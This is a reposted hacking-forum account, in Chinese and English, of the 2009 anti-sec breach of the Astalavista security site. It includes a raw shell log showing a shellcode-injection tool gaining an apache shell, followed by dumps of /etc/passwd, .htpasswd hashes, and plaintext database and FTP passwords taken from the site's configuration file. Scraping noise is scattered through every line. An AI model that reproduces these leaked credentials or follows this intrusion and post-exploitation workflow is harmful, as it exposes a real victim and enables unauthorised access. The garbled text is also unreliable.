中国网络渗透测试联盟

标题: Astalavista被蹂躏过程 [打印本页]
作者: admin    时间: 2012-11-6 21:07
标题: Astalavista被蹂躏过程
里面两个亮点,一是远程获得apache用户权限的shell,banner是LiteSpeed,看来这玩意有0day,但是又怎么是用apache用户跑的,原来LiteSpeed这东西是和apache绑一起的,大概看了下介绍,主要功能是anti-ddos,这东西貌似还有点意思,回头玩玩。具体的看链接标记[url]http://www.litespeedtech.com/litespeed-web-server-features.html[/url]。
5 W: W. p; V1 T3 Z, {4 A
! A# k3 m% F9 G) W' E5 I1 F; x; O. B[root@front3 ~]# curl -I litespeedtech.com
/ t5 d) Z* X" D& r5 SHTTP/1.1 200 OK7 q6 n0 ?) e6 E, O- A1 c
Date: Fri, 05 Jun 2009 22:54:51 GMT  E5 s7 {" y* i7 f5 W! G% q' u
Server: LiteSpeed
/ E' k  p+ m$ g( N5 F4 [
( ]; H* Q# \* l  X$ k. n2 y另外一个亮点就是localroot了,如果不是udev的话,那么就是RHEL5.3  x64还有一个localroot 0day -_-
" B& H. v: }4 i& ^$ T! ~# J7 ]; B+ C0 I3 V7 W" ^; `
有人说astalavista被黑是因为Y拿milw0rm的东西赚钱,这个我觉得就是每个人的尺度问题,有人还把别人写的文章弄成自己写的,还有人把别人的程序改成自己的,多了去了。
3 [1 k) f; S7 J! Q2 @2 E2 }* E
3 e2 O' Z8 F$ {# k8 \' ]' t2 |' t! |; r
/  _  \  /   _____/\__    ___/  _  \ |    |     /  _  \   \ /   /|   |/   _____/\__    ___/  _  \ 8 T  Z; q1 G9 E6 v1 T
/  /_\  \ \_____  \   |    | /  /_\  \|    |    /  /_\  \   Y   / |   |\_____  \   |    | /  /_\  \8 S! n( N+ N- v( H
/    |    \/        \  |    |/    |    \    |___/    |    \     /  |   |/        \  |    |/    |    \
0 X" d/ h1 s" ?8 y\____|__  /_______  /  |____|\____|__  /_______ \____|__  /\___/   |___/_______  /  |____|\____|__  /
/ L+ f/ R4 O9 j  P* s        \/        \/                 \/        \/       \/                     \/                 \/
4 j0 \* [- A2 E) a                                  The Hacking & Security Community3 v3 b0 w( E+ {- R. d4 E' b( A3 ^
[+] Founded in 1997 by a hacker computer enthusiast
! m* N  e  E* V; @. C" P: M[-] Exposed in 2009 by anti-sec group9 o9 e4 D7 F% g& D# U
% g" S' R; k" C) H; P; y( Q1 Q
From < <b style=”color:black;background-color:#ffff66″>http</b>://<b style=”color:black;background-color:#ffff66″>astalavista</b>.<b style=”color:black;background-color:#ffff66″>com</b>/faq>:$ k6 |1 b7 c+ o5 Q; P8 W5 y) G
>> 03. Who’s behind the site?8 p: I# ]4 R6 V0 x  K1 s5 o0 I6 D
>>
( O9 _2 D# J( a; T9 b>> A team of security and IT professionals, and a countless number of contributors from all over the world.
0 N8 g: x5 C' u$ G' g8 c% ^, n. w* q( n2 i$ h1 Y5 t
>> 05. Is it true that the site is visited by script-kiddies and warez fans only?
+ r5 M" k4 [/ `0 E% _( c' w. c& b>>
3 I+ i+ z: S$ H4 E% g7 e. i! c>> Absolutely not! The audience behind the site consists of home users, worldwide companies and corporations, educational and non-profit organizations, government and/ U2 f! V( q7 C
military institutions.  y: k% k+ h) _9 |9 W/ b+ g5 {
>> All of these have been visiting the site on a daily basis for the past couple of years, contributing in various ways, or requesting services and information.
1 u( v" B$ [6 B+ m& b+ c9 o& m" d  ?" Q2 t3 z5 B
Why has Astalavista been targeted?
; X, ^: n' u8 Z1 F
2 E, E0 r% W/ s3 }4 S4 W# ^* YOther than the fact that they are not doing any of this for the “community” but
% k+ G+ e0 a. v. c+ Yfor the money, they spread exploits for kids, claim to be a security community
  l" y: m# ?& z) r/ |/ U* T0 F  u(with no real sense of security on their own servers), and they charge you $6.66: t3 _% `/ z4 j$ ]# X/ K: R
per months to access a dead forum with a directory filled with public releases+ u) H4 [2 _# n# I+ }. V- A! d
and outdated / broken services.
" J( v$ Y0 ?3 g5 U0 e2 l
0 ^/ k0 |( k: \4 v9 W3 TWe wanted to see how good that “team of security and IT professionals” really is.
6 v6 V' i6 G2 W/ ]0 J3 |* q* U% {! D8 E% [6 a
Let’s begin.7 d+ I4 D: d$ `8 A7 g. J; y$ S& d

+ m* z6 I( l! P  Q" Q1 o; u& Q- g1 ^anti-sec:~# ./g0tshell astalavista.com -p 80
. R5 P5 g' N% c- L( a[+] Connecting to astalavista.com:80
+ X5 x  ~3 x$ v: H! l[+] Grabbing banner…
- M5 S' ^7 t: U# C6 [; l4 h( o4 JLiteSpeed' [( R" R5 G. t6 G  L# Q6 w$ z
[+] Injecting shellcode…3 p( o" A/ T! a
[-] Wait for it8 a5 M2 R0 _1 b$ U0 s$ O

4 P# b5 b4 N) |( t* c[~] We g0tshell! [3 W! b2 v2 L9 N9 s$ L
uname -a: Linux asta1.astalavistaserver.com 2.6.18-128.1.10.el5 #1 SMP Thu May 7 10:35:59 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux
4 `9 \6 p/ x5 b1 s+ l$ uID: uid=100(apache) gid=500(apache) groups=500(apache)
" d5 u$ q: i- u- H9 R- j8 }; ~  z' ]- I7 H+ `
sh-3.2$ cat /etc/passwd3 {; f$ d6 t/ V
root:x:0:0:root:/root:/bin/bash  G8 g# V$ y5 v
bin:x:1:1:bin:/bin:/sbin/nologin
+ n: F2 m( `5 |. P4 P; tdaemon:x:2:2:daemon:/sbin:/sbin/nologin
2 B4 @. Q$ X. ^7 e% o% g# Tadm:x:3:4:adm:/var/adm:/sbin/nologin: h# U" z; b( }5 \) p! y) E
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
+ c) R6 H# l0 ^% vsync:x:5:0:sync:/sbin:/bin/sync
0 E1 E1 U% d3 J6 y: J1 W2 D  eshutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
9 h0 y+ s$ q6 |2 S" V! ]: phalt:x:7:0:halt:/sbin:/sbin/halt2 b2 H1 ^$ P7 s
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
8 p, U! e& Y( l- X6 I: e" r( R9 qnews:x:9:13:news:/etc/news:* _1 T7 D  x6 c
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
! I5 A( Y* ~: U$ x4 }5 \& U7 \* |: Doperator:x:11:0perator:/root:/sbin/nologin, g: {& d& O8 |( [5 e! z
games:x:12:100:games:/usr/games:/sbin/nologin% i* Y9 M; R1 A( L& {; i
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin. E$ F0 p  ~8 N2 x. J8 l) x
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
& n. b$ }' a" h5 @nobody:x:99:99:Nobody:/:/sbin/nologin  v% q5 d, m7 U9 c' P
rpm:x:37:37::/var/lib/rpm:/sbin/nologin
1 o0 O$ S. B1 w7 cdbus:x:81:81:System message bus:/:/sbin/nologin
$ R! X" W# I( M3 Hnscd:x:28:28:NSCD Daemon:/:/sbin/nologin: i2 Z9 [5 I' _: v0 U+ |
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin! ~4 k$ @4 T) ?' `
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin! F0 V  R* a% |* Y  g& l% F
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin* w, y" {5 K/ \8 B" X
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
, E* ?0 E0 P. ^0 x" l- jrpc:x:32:32ortmapper RPC user:/:/sbin/nologin0 A/ ~: c1 {7 ~2 Q
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin$ k' G8 n9 T  N" h; D' l" T4 r
nfsnobody:x:4294967294:4294967294:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
+ W; W( W8 j) n' _, M5 V  asshd:x:74:74rivilege-separated SSH:/var/empty/sshd:/sbin/nologin/ |. I# o2 o: ~- O, W
pcap:x:77:77::/var/arpwatch:/sbin/nologin7 x1 K6 z- s8 ]6 h  p
named:x:25:25:Named:/var/named:/sbin/nologin
" Q% a5 {. z1 Mapache:x:100:500::/var/www:/bin/false. J% r  ?; N& }% ]$ h1 l- ~8 U. n
diradmin:x:101:101::/usr/local/directadmin:/bin/bash
) @8 c) `8 T5 f9 j, O; M3 |7 }/ H, umysql:x:102:102:MySQL server:/var/lib/mysql:/bin/bash
8 w( o6 Q+ T) u; o2 |/ Gwebapps:x:500:501::/var/www/html:/bin/bash, `) i8 y7 r: B( }8 l
majordomo:x:103:2::/etc/virtual/majordomo:/bin/bash3 _  O1 i' A/ r: b1 N/ X
admin:x:501:502::/home/admin:/bin/bash9 u# x/ G3 L  x) X1 R5 ~7 U
jon:x:502:503::/home/jon:/bin/bash4 Y; d. r, }7 C$ D3 c
com:x:503:504::/home/com:/bin/bash
1 g3 y- u3 O4 D0 e" Vntp:x:38:38::/etc/ntp:/sbin/nologin. z7 B" t3 U. a# P+ f: W
ais:x:39:39penais Standards Based Cluster Framework:/:/sbin/nologin& P5 O4 @8 y9 Y4 W$ O
astanet:x:504:505::/home/astanet:/bin/bash
1 q+ _% Z. x6 |, x- L+ d* Gavahi:x:70:70:Avahi daemon:/:/sbin/nologin, m" ^# D4 R( G. w! L1 Z! G
avahi-autoipd:x:104:103:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin1 D4 k/ q9 G4 x8 P; h( v

, j9 _( H$ e% p1 |$ vsh-3.2$ cat /etc/hosts
; B& \+ X2 A0 S' k! l# Do not remove the following line, or various programs
' e9 ^. |- r( c! P4 G# that require network functionality will fail.
7 o: L. Z5 Z& s/ k127.0.0.1       localhost.localdomain   localhost
5 G% M8 S" @9 K" w$ h8 K::1     localhost6.localdomain6 localhost6
) \0 R* b1 Y$ c7 ?" d7 `. B80.74.154.172           asta1.astalavistaserver.com" k) R. ^% d) V) A3 W

' J8 U9 ~' s6 Nsh-3.2$ pwd9 j4 u5 u) S- v+ f9 j9 C* w; w
/home/com/public_html
, |2 R3 e. j' E# t* ^7 n8 B' F- |5 R3 l2 g; V6 v' |
sh-3.2$ ls -la
4 m, X# u4 x) G3 K/ N, g" m: ?total 18460
8 L9 @( s! s' B5 }( z, Ddrwxr-xr-x 30 com apache     4096 May 28 17:06 .
! ]/ Y# O7 V; |1 j  }/ Mdrwx–x–x 11 com com        4096 Jun 25  2008 ... `( H5 r, y$ `3 R5 o% w
drwxr-xr-x  2 com com        4096 Feb  2 19:29 admin7 w8 ^5 p) J2 `  l5 x" ^" \  s
drwxrwxrwx  2 com com    18591744 Jun  4 08:04 cache. `2 Q8 S- F  x
drwxr-xr-x  6 com com        4096 Mar 28 21:17 cadmin, A8 U8 k' l6 q
drwxrwxrwx  2 com com        4096 May 19 00:50 config+ G; X( \: L( [7 W
drwxr-xr-x  2 com com        4096 Mar 20 11:05 core
- A  R6 W/ c2 b: Fdrwxr-xr-x 18 com com        4096 Feb  2 19:29 core_modules/ d- v& L- f; W4 u5 M  ?& b
drwxr-xr-x  4 com com        4096 Feb  2 19:29 customizing% E1 t$ {3 R3 `: Q  U- k+ v
drwxr-xr-x  2 com com        4096 May 11 13:24 customizing_paulo
0 z2 Y  G8 R+ M# W0 w! Ldrwxr-xr-x  6 com com        4096 Mar 30 12:28 __DELETE__( i5 S8 M8 H8 a, T1 x: V( ~8 ]
-rw-r–r–  1 com com        8035 May 19 14:26 directory_to_mediadir.php: T( ?8 ]8 r7 T5 s$ ~5 W
drwxr-xr-x  2 com com        4096 Sep  9  2008 dvd
* n4 ^  _( l1 t0 Gdrwxr-xr-x  3 com com        4096 Feb  2 19:29 editor
& g" E, d- n8 H-rw-r–r–  1 com com        3750 Feb 27 16:12 favicon.ico6 y) @9 h3 _$ Z0 h9 S1 q2 p/ O
drwxrwxrwx  2 com com        4096 Jun  4 08:00 feed3 l7 P8 C" J+ D( d' J
-rwxrwxrwx  1 com com       10736 May 29 12:44 .htaccess
3 u# ]; @# `% ?-rw-r–r–  1 com com        7638 Apr 21 08:45 .htaccess.2009-04-21.bak
2 m5 k4 y# H4 c" q-rw-r–r–  1 com com       10768 May 11 11:53 .htaccess.2009-05-11.bak+ F! p, T5 }- ?/ z. j& Y
drwxr-xr-x 18 com com        4096 Apr  9  2008 ideapool9 i! r. M# Q6 a7 h
drwxrwxrwx 14 com com        4096 Feb  2 19:29 images% P, A7 ~; S* z$ T% b
-rw-r–r–  1 com com       97496 Jun  2 13:01 index.php8 F5 e3 m, T  S1 I6 n% g. j
drwxr-xr-x  6 com com        4096 Feb  2 19:29 installer
; q& b! P% y, U$ Y4 y* Edrwxr-xr-x  8 com com        4096 Feb  2 19:29 lang$ u) n. [/ O+ s8 ^0 ~8 P/ P
drwxr-xr-x 22 com com        4096 Feb  2 19:29 lib) y7 ?2 \' f: B8 D$ L9 c+ X
drwxrwxrwx 12 com com        4096 Jun  2 07:47 media, H6 [9 D3 w' h; S
drwxr-xr-x  8 com com        4096 May 11 12:48 modifications7 {+ I3 W9 v2 U8 ~. `' p+ Q
drwxr-xr-x 34 com com        4096 May 28 16:30 modules: E$ ~9 u; B3 W* i% J$ _4 T
drwxr-xr-x 11 com com        4096 Jan 30 15:00 _myAdmin
! C$ a; f# ^& D; t3 X- V! k& X! ^drwxrwxr-x 22 com com        4096 May 28 17:06 _new$ q& o8 f# r1 f) l2 ^
drwxr-xr-x 26 com com        4096 Feb  2 19:27 _old, y* m& |& @, C/ s$ V2 ~
drwxr-xr-x  2 com com        4096 Mar 30 12:29 phproxy2 g- H/ ^5 \) {( {
drwxr-xr-x  2 com com        4096 Mar 30 12:30 proxy  i5 x* _5 M' K' o8 A. c
-rw-r–r–  1 com com          26 Feb  2 19:33 robots.txt
# g4 C# o% M; A-rwxrwxrwx  1 com com       10844 Jun  2 09:50 sitemap.xml8 F# F* U2 v7 M, q! Z
-rw-r–r–  1 com com         223 Mar 30 15:32 test.php+ O4 M6 T# P* U2 c2 B
drwxrwxrwx  8 com com        4096 Mar  6 13:15 themes. ?) c' Q# m. q, L4 I6 ^
drwxrwxrwx  3 com com        4096 Jun  4 08:00 tmp8 X( N* k; M0 H- p: r7 F2 F
drwxr-xr-x  3 com com        4096 Feb  2 19:33 webcam' O: H1 ]8 @4 V# @6 w& P. y

6 }) O) a: C( b+ `: h* H" Z. Fsh-3.2$ head -20 index.php
2 N* H% W9 ~' o8 a<?php0 U: f/ c* y& P0 z; V; R

" @& y. }3 I  e' P; E2 O4 c, a/**
- v: b5 m! h$ u* The main page for the CMS( \5 ~* f: a8 F* W/ J
* @copyright   CONTREXX CMS - COMVATION AG" C6 D3 O* r; Z/ {7 V; Q+ M
* @author      Comvation Development Team
  N5 K, O4 H( h) ?. p8 c* @version     v1.0.9.10.1 stable0 F7 f5 \* M% S1 i/ c7 O$ h# t
* @package        contrexx
2 K' j9 v7 q* R9 F' _' d/ i* @subpackage    core) |9 }. u5 ^. `3 x
* @link        链接标记[url]http://www.contrexx.com/[/url] contrexx homepage
3 J+ o$ O+ U; A* @since       v0.0.0.02 i' m. G+ V4 E5 u+ u( D
* @todo        Capitalize all class names in project
8 C9 v# F* a! u: ~3 q1 `1 o5 N* @uses        /config/configuration.php
7 H8 @: {  i# l) o* @uses        /config/settings.php
: f0 q4 c4 S8 B+ M& B9 i* @uses        /config/version.php
( t' f' w% Q, z0 O* @uses        /core/API.php
+ ?0 S3 P' S% r  S. \! b* @uses        /core_modules/cache/index.class.php! @3 C1 ^, U  \0 y
* @uses        /core/error.class.php$ J# J. O# i0 G1 {+ L- n* ~
* @uses        /core_modules/banner/index.class.php) U0 H: {. G2 `) \/ R$ l
* @uses        /core_modules/contact/index.class.php+ I8 _" e0 U6 \0 X  h" ~6 B; x* I) ]

5 }8 p! U- u2 N( J' k# R& {% [sh-3.2$ cd config/
  P+ }( |" s7 N5 csh-3.2$ ls -la
: L5 q* V  q5 V% w4 R, i3 @' u  xtotal 323 `: t2 `+ H6 v8 X/ z: o7 m
drwxrwxrwx  2 com com    4096 May 19 00:50 .: g$ C/ u1 ]! I
drwxr-xr-x 30 com apache 4096 May 28 17:06 ..
  M. L$ ]/ ?) E( b( w5 k1 l-rwxrwxrwx  1 com com    2998 May 11 12:29 configuration.php
: k7 i# c4 _& s# R-rwxrwxrwx  1 com com    7610 May 28 17:27 set_constants.php' u& V8 G* @0 w
-rwxrwxrwx  1 com com    4186 May 25 12:54 settings.php3 f( g! D  U7 t/ O1 X0 v
-rwxrwxrwx  1 com com     672 Feb  2 19:29 version.php# C' S( `, C% {% f

& z% J% A% H% p3 f* Esh-3.2$ cat configuration.php1 j7 ~; f: c% a8 y; S
[snip]2 h9 ~9 O) `/ E! s( q
$_DBCONFIG['host'] = ‘localhost’; // This is normally set to localhost0 c$ z: E  Q4 m  J+ ~+ Y
$_DBCONFIG['database'] = ‘com_contrexx2_live’; // Database name  Y/ Q& |' D* _% p# m, Z& G
$_DBCONFIG['tablePrefix'] = ‘contrexx_’; // Database table prefix
3 v6 k& D6 B  o/ A0 u- W0 O$_DBCONFIG['user'] = ‘contrexxuser2′; // Database username
) O# r2 X" P  t0 [$_DBCONFIG['password'] = ‘0fEYNZgXz1pKe’; // Database password) b- m6 E  T' _& E6 g/ M2 K
$_DBCONFIG['dbType'] = ‘mysql’; // Database type (e.g. mysql,postgres ..)
& a- X0 `$ j. q& N$_DBCONFIG['charset'] = ‘utf8′; // Charset (default, latin1, utf8, ..)
  F! |% `7 p" [/ _[snip]( |" @. _' ^4 m1 y
$_FTPCONFIG['is_activated'] = true; // Ftp support true or false
' i8 s4 d8 C+ R7 K$_FTPCONFIG['use_passive'] = true;      // Use passive ftp mode$ h+ M" A, |; {
$_FTPCONFIG['host']     = ‘localhost’;// This is normally set to localhost0 Q' h/ D1 h8 I# v  a7 U' l3 M
$_FTPCONFIG['port'] = 21; // Ftp remote port5 |  B9 ^5 ]' C4 M/ X
$_FTPCONFIG['username'] = ‘链接标记dev@astalavista.com’; // Ftp login username5 Z1 j! j% J9 S  I0 A& n
$_FTPCONFIG['password'] = ‘jajklop0Iuj’; // Ftp login password5 a' b8 U- X  P
$_FTPCONFIG['path']     = ‘/’; // Ftp path to cms
4 Y6 W! l- ?8 I9 V% b" ^
# L/ d1 K  i# jsh-3.2$ cd ..9 g0 |( N/ n/ ^  R" A% K: |
sh-3.2$ cd dvd/
1 C# H' K* g4 D+ O3 w: f, {2 vsh-3.2$ ls -la
  s- Z) G  G  R# u$ z2 g  vtotal 2913780
) O3 }+ O$ ~6 b! _drwxr-xr-x  2 com com          4096 Sep  9  2008 .# y0 V& W& w  `: S/ W; L& q
drwxr-xr-x 30 com apache       4096 May 28 17:06 ..6 R" o/ [. D; b# y9 Y1 f5 F
-rw-r–r–  1 com com    1050061483 May 16  2008 astalavista_security_toolbox_dvd_2008.part1.rar
" H/ S$ g$ @/ d! `" L3 N-rw-r–r–  1 com com    1050061483 May 16  2008 astalavista_security_toolbox_dvd_2008.part2.rar+ I: r7 }/ \$ N! U9 Y
-rw-r–r–  1 com com     880644069 May 16  2008 astalavista_security_toolbox_dvd_2008.part3.rar- d( _( @; d$ A; D
-rw-r–r–  1 com com           115 Jan 29  2008 .htaccess
) ~! N0 O$ D% e. F* Z( Z: D5 m: v. H( h: g* ~
sh-3.2$ cat .htaccess$ l& q; b2 f! R( D# ]- D1 b$ g) j
authType Basic) N: |! `+ U$ y4 M) M
authName DVD
* E2 j% e7 B8 Z; ]  j( `4 nauthUserFile /home/com/domains/astalavista.com/.htpasswd/.htadm_pwd2 R3 T9 P8 |! i; Z( j$ ]
require valid-user4 g3 K5 L6 v; k8 W- V. h. s
3 U$ ]$ w, R( I. y
sh-3.2$ cat /home/com/domains/astalavista.com/.htpasswd/.htadm_pwd
8 G# ]' U$ x, u7 O( \- IDVDdownload:CRD8cuY6.MPT6
/ X: c7 ]  s5 G1 W( o5 kDVDdownload2:CR8a36.wluFMg
, r) d3 B) b1 Q2 M$ `. l. q. n! @& X7 p
sh-3.2$ cat test.php
) y" n  H4 N. ^4 `8 U4 e  x' w2 G# W<?php
  I8 a  m+ b# `/ T" ~$url = ‘aHR0cDovL2kubnVzZWVrLmNvbS9pbWFnZXMvdGVtcGxhdGUvMzYweDMxOC9pc3QyXzc0Njc4MV9mZW1hbGVfc3R1ZGVudC5qcGc%3D’;# l$ A- G" v; t( @. T) J
$url = str_replace(array(’&amp;’, ‘&#38;’), ‘&’, base64_decode(rawurldecode($url)));$ H& [7 v/ G9 L$ Z( a% u
echo $url;+ h- W' \& r2 ^4 f+ A) a
?>
& K: m# B1 ^. P
( C( `1 {8 f; J; C- k: n' ?sh-3.2$ cd modifications/
+ i/ v& ^, N1 m" Q9 G. hsh-3.2$ ls -la/ q/ O; p% m1 E) O9 W& `  G; e
total 325 n1 I9 S' d. n
drwxr-xr-x  8 com com    4096 May 11 12:48 .
: t( H& M9 ?. B6 X, T3 m3 V7 bdrwxr-xr-x 30 com apache 4096 May 28 17:06 ..0 L8 W0 P. I% A/ F- D0 V5 z
drwxr-xr-x  3 com com    4096 Feb  2 19:33 com_avtng3 Q/ M: T  @1 H2 w; }- B, @
drwxr-xr-x  3 com com    4096 May 12 09:26 cronjobs
" i4 e* }) Z+ G. }: o' v; ?drwxr-xr-x  2 com com    4096 Mar  2 10:35 onlinetools1 }0 H# S: E. q
drwxr-xr-x  4 com com    4096 Feb  2 19:33 pjirc
9 P- ?4 G2 ?( R4 N) i7 hdrwxr-xr-x  2 com com    4096 Feb  2 19:33 search, V7 W3 w3 p* }# L) L0 D( Z" y
drwxr-xr-x  2 com com    4096 Mar 25 08:56 _tmp
' a7 t! J6 w8 l0 i5 u2 ~6 y/ O: o. Q8 T
sh-3.2$ ls -R
9 F" k/ H# r% t6 i8 ?.:
, i; w0 D5 y7 I; y* h) j" Scom_avtng  cronjobs  onlinetools  pjirc  search  _tmp
1 J+ B8 G3 \6 g1 M8 P  B) c
$ I) {/ Z4 `. e8 B/ O) [/ ^./com_avtng:6 D, r# F/ b5 M7 R) J  d( R: k
avtng.php  banner_bottom.inc.php  banner_button.inc.php  banner_content.inc.php  banner_popunder.inc.php  banner_right.inc.php  banner_top.inc.php  iframe.php  scripts9 P: @% I( L$ D' i$ K

% \1 m! j' b6 J3 V) l$ S+ o" t./com_avtng/scripts:+ ^# S; f% V5 }0 b
popunder.js
4 _  ?4 c* z1 q, u; X' X  i1 s& q7 u, k% z
./cronjobs:( \/ _; i- ~# J+ w: q( B
exploits.php  exploits.sh  google_blogindexing.php  ip2country.sh  proxydb2.php  proxydb.php  securitynews.php  tmp9 m; ]7 v7 r8 ]& P
+ Y' x- b7 Z9 M
./cronjobs/tmp:
+ K: D# q+ ~/ @contrexx_module_onlinetools_defaultports.csv  contrexx_module_onlinetools_geolitecity_country.csv
4 G9 x) u$ G3 A$ D) A, v8 b+ M: A" k; R$ Q  \8 p' l
./onlinetools:# i# |* l; ~2 ], W$ t$ V
index.php- O0 S. }' p" j/ i
, g+ t; i6 R! S! o. o- }
./pjirc:
  ?: Z1 {* ]- U3 r- p+ L  a& _% Fa_big.jpg          english.lng       img              irc.jar           NormalApplet.html  pixx-french.lng  pjirc.cfg       securedirc-unsigned.cab  thanks.txt; a4 C( P5 G0 n
AppletWithJS.html  french.lng        IRCApplet.class  irc-unsigned.jar  pixx.cab           pixx.jar         readme.txt      SimpleApplet.html        versions.txt
) J4 b5 N4 ^* m  K" w  z2 m+ tbackground.gif     HeavyApplet.html  irc.cab          license.txt       pixx-english.lng   pixx-readme.txt  securedirc.cab  snd
/ u/ C4 t' z+ [" c# A* `/ |2 y( X9 X3 L
./pjirc/img:
3 Q% l% V1 J* O5 X# m; Xange.gif    bombe.gif   clin-oeuil.gif         content.gif  enerve2.gif  garcon.gif     langue.gif  mecontent.gif  ordi.gif       portable.gif   sapin.gif    triste.gif) T$ M. z1 i$ b/ Z! }( o
arbre.gif   bouche.gif  clin-oeuil-langue.gif  cool.gif     femme.gif    grognon.gif    lettre.gif  newbie.gif     pere-noel.gif  pouce-non.gif  sleep.gif   
, i; r+ P) Q$ k0 M9 ^verre-eau.gif: p* u0 O- C; X) ]7 k' A
argh.gif    bouqin.gif  coeur-brise.gif        diable.gif   fille.gif    halloween.gif  lit.gif     OH-1.gif       pleure.gif     pouce-oui.gif  soleil.gif  
5 S, c/ G$ s& r7 T4 everre-vin.gif
3 n5 }* x6 P; H# B$ J' Nballon.gif  cadeau.gif  coeur.gif              dwchat.gif   fleur.gif    hamburger.gif  love.gif    OH-2.gif       poisson.gif    roll-eyes.gif  sourire.gif  yinyang.gif
. _" {) p$ Y  Pbiere.gif   chien.gif   comprends-pas.gif      enerve1.gif  fume.gif     homme.gif      lune.gif    OH-3.gif       pomme.gif      rouge.gif      terre.gif/ `' q' P4 L% S3 v7 f+ W' J

  _7 `- |0 J2 \! q./pjirc/snd:! ]0 ^" N$ I& j$ Q7 x
bell2.au  ding.au
. z0 F" W4 \. c- X( h
2 }) k( J8 b% |8 _./search:5 ~( n/ N6 K) {- F/ o2 c& w
searchEngines.php  search.php
' D# L7 E" s7 ?) R) @5 V
3 S4 ?% o3 }; s# W$ e# X& n& P./_tmp:
% s$ y. O; B# C! q# adefaultPorts.php  defaultPorts.txt
; _* w4 K  e. g: k$ P4 \/ ]9 F9 T' h& U) w2 @
sh-3.2$ cd cronjobs/
& [2 a& {: ?- T, L2 W  R, |sh-3.2$ cat exploits.php
0 Y3 J# C/ ?' W4 r3 L% y, `[snip]( P5 y, x/ {! d4 ?* ]
$categories   = array();
/ |, r" e+ @6 o1 F4 R$milw0rmFile  = FULLPATH . ‘/modifications/cronjobs/tmp/milw0rm/sploitlist.txt’;$ e$ m9 F! j* Q) f+ t; S% _% Y" F
$expolits     = file($milw0rmFile);
+ j2 e2 ~& k8 B5 W$comExploits  = array();% E3 Z& D5 [" P: K
[snip]
6 \0 ~. x3 X$ s. i  Y// manage data
% v" U4 ]) _9 F. N0 J6 }for ($x = 0; $x < count($expolits); $x++){ // count($expolits) - 2640
+ Z: K+ r7 n8 b6 d. ^# C6 x$ |
, j2 a* a' m! {+ |& _% v    // get path and title
9 l# R$ o; T" [; d4 l( H0 G- s% ^    $expolits[$x] = trim($expolits[$x]);4 P! w& m" w, M+ P4 ~' U
    $path         = str_replace(’./’, FULLPATH . ‘/modifications/cronjobs/tmp/milw0rm/’, substr($expolits[$x], 0, strpos($expolits[$x], ‘ ‘)));
+ w5 a6 C8 W, \' w    $title        = htmlspecialchars(substr($expolits[$x], strpos($expolits[$x], ‘ ‘) + 1, strlen($expolits[$x])), ENT_QUOTES);# j& V% |9 ~1 r

$ C8 M" ]( ^% D; ^& b    // check if file exists& x1 D- u4 a; _
    if (file_exists($path)) {
7 v9 A/ A! [* u; t, r$ G
3 ?  f! w7 `" m/ h7 K        $text = file_get_contents($path);( j& L) i' U3 J; _. E" _! g

7 X; w, O( \' |; w7 V        // get content and date2 B, |* i' W& a) ?: Q9 G. l/ s
        //$text = htmlspecialchars($text, ENT_QUOTES);* }; x& ~0 l8 F' Z
        $tmptext = addslashes(htmlentities($text,  ENT_QUOTES, “UTF-8″));6 G4 P1 e4 m( J; V
        if ($tmptext != ”) {
# l( a& c! I# a* }; r* s9 e            $text = $tmptext;5 W; ~3 Q# @4 R" E' X3 f, ?
        } else {9 W) C* T. _( `- p
            $text = addslashes(htmlentities($text,  ENT_QUOTES));
. U  E% f- u. ~* ^4 s3 M        }6 Z) w" r* N, ?' C
        $date = str_replace(’milw0rm.com [', '', str_replace(']‘, ”, strstr($text, ‘milw0rm.com [')));
* r( y* {! k& ~* O        $tmp  = explode('-', $date);/ x! y; p3 p0 Q; U) C  n2 b1 j
        $date = mktime(0, 0, 0, trim($tmp[1]), trim($tmp[2]), trim($tmp[0]));; b' h1 [% h1 }- f
        $cat  = getCategory ($path);* A- j1 I" k; G1 b% u
        $ext  = pathinfo(basename($path));
; J$ f) p5 }1 N( m        $ext  = $ext['extension'];$ s* {) R+ m$ D
        $qStr = ”
2 C8 Q2 k6 {- }            SELECT  `id`
$ s4 O6 f0 K6 d6 ]4 N% U- d3 S            FROM    `contrexx_module_exploits`! V# V3 D: `: R' {9 s3 K' H
            WHERE   `title`  =  ‘” . $title . “‘
/ d8 w# z# n$ j) i$ X5 g9 L            AND     `date`   =  ‘” . $date . “‘' i: l8 Z+ L/ Z; h3 C0 G+ s
        “;
% @4 Y9 L5 Y( r# y1 P; u# a" K        echo $x + 1 . ‘ von ‘ . count($expolits) . ‘ -> ‘ . $qStr . “\n”;4 m5 ~1 M/ L# C2 L
        $q = $_objDB->query($qStr);( G/ C# @7 D5 d- C; N8 @$ |
, G: a/ ^3 ^3 T% U
        if ($q->numRows() == 0) {% v/ c1 B2 U9 b, G( B$ d2 l7 j
( X" Y% B( n- l$ I. p# F
            // prepare array
5 H6 a* h$ G5 S4 X4 O- U            $comExploits[$x]['date']      = $date;
1 h$ D9 T1 h  Y$ W            $comExploits[$x]['title']     = $title;2 t( g* P  \5 H* N  P* a
            $comExploits[$x]['author']    = ‘milw0rm’;* U; L* S2 e( N, W$ W6 c+ e: I1 F
            $comExploits[$x]['text']      = $text;
, m5 \+ _1 z( ~" {            $comExploits[$x]['source']    = $ext;
- e3 }% `: s: N            $comExploits[$x]['url1']      = ”;5 r2 R* n5 J) s: w1 p
            $comExploits[$x]['url2']      = ”;7 R- y  S4 f3 P& e
            $comExploits[$x]['catid']     = $cat;
; _/ ^/ j4 j3 B8 i            $comExploits[$x]['lang']      = ‘2′;
, c/ c8 R9 Y3 ?" s4 h5 _            $comExploits[$x]['userid']    = ‘12′;
: H9 r- h6 ^! ~* T2 `            $comExploits[$x]['startdate'] = ‘0000-00-00′;0 u' `: A$ W) K5 B* i
            $comExploits[$x]['enddate']   = ‘0000-00-00′;3 k1 H! N/ h$ [" _3 n/ h* {* x& s
